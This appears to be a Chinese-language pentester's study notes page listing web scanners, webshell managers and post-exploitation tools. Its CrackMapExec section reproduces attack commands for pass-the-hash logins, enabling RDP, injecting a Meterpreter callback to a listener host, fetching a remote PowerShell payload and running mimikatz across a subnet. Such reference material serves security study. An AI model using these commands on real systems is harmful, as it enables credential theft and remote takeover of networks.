wallhaven-x8lp7z

等保培训

  • 关键信息基础设施

PenTest-Tools

1、domainname 域名搜集工具

2、webscan web扫描工具

  • 3xp10it

  • AngelSword

    • Python3编写的CMS漏洞检测框架

  • AutoSploit

    • Automated Mass Exploiter(远程/外网)

  • AZScanner

    • 自动漏洞扫描器,自动子域名爆破,自动爬取注入,调用sqlmapapi检测注入,端口扫描,目录爆破,子网段服务探测及其端口扫描,常用框架漏洞检测。

  • BBScan

    • A fast vulnerability scanner

  • cansina

    • Web Content Discovery Tool

  • Fast_Scan

    • Quick and Dirty full-connect scanner.
    • ./fastscan 192.169.1.1

  • FingerPrint

  • F-MiddlewareScan

    • 实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell

    • python F-MiddlewareScan.py -h 10.111.1
python F-MiddlewareScan.py -h 192.168.1.1-192.168.2.111
python F-MiddlewareScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6

  • GetTitle

    • gettitle.exe 192.168.1/192.168 80,8080,8181,8000 100

  • GitPrey

    • GitHub敏感信息扫描工具

  • htcap

    • htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.

  • httpscan

    • httpscan是一个扫描指定CIDR网段的Web主机的小工具。和端口扫描器不一样,httpscan是以爬虫的方式进行Web主机发现,因此相对来说不容易被防火墙拦截。

    • ./httpscan.py 10.20.30.0/24 –t 10

  • lalascan

  • pentestEr_Fully-automatic-scanner

    • 定向全自动化渗透测试

  • w9scan

    • 全能型的网站漏洞扫描器

  • K8Cscan

  • phpsploit

  • RED_HAWK

  • S7scan

  • Scan-T

  • Spaghetti

  • XAttacker

  • truffleHog

  • WAFNinja

  • weakfilescan

  • webvulscan

  • whichCDN

    • CDN探测

  • Sn1per

  • WPSeku

    • Wordpress Security Scanner

3、web fuzz工具

4、webshell工具

  • antSword
  • Cknife
  • 冰蝎
  • godzilla

5、后渗透利用工具

Night

~今日份漏洞学习~

~PayloadsAllTheThings学习~

  • impacket

  • InveighZero

    • Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool

  • mimikatz

  • Active Directory资源管理器

  • CrackMapExec

    • CrackMapExec(又称CME)是一个后渗透工具,有助于自动评估AD的安全性。

    • 二进制下载

    • 基础语法

    • # use the latest release, CME is now a binary packaged will all its dependencies
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip

# execute cme (smb, winrm, mssql, ...)
root@payload$ cme smb -L
root@payload$ cme smb -M name_module -o VAR=DATA
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
root@payload$ cme mimikatz --server http --server-port 80

    • ADRecon

    • .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser

    • Active Directory Assessment and Privilege Escalation Script

    • powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1